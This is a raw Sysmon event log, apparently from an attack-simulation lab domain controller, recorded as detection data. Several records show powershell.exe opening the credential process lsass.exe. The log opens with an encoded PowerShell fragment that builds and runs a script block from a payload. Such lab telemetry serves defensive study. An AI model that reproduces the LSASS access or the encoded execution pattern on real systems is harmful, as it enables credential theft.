BjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000005764Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.567{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005763Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.567{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CE0-5FA1-3201-000000008801}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005762Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005761Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005760Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005759Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-3401-000000008801}4568C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005758Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005757Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005756Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005755Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005754Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005753Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005752Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CE0-5FA1-3401-000000008801}4568C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005751Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7CE0-5FA1-3301-000000008801}45604580C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CE0-5FA1-3401-000000008801}4568C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005750Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.544{D28789B6-7CE0-5FA1-3401-000000008801}4568C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CE0-5FA1-3301-000000008801}4560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000005749Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE0-5FA1-3301-000000008801}4560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005748Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005747Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005746Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005745Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005744Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005743Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005742Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005741Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:04.536{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005740Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 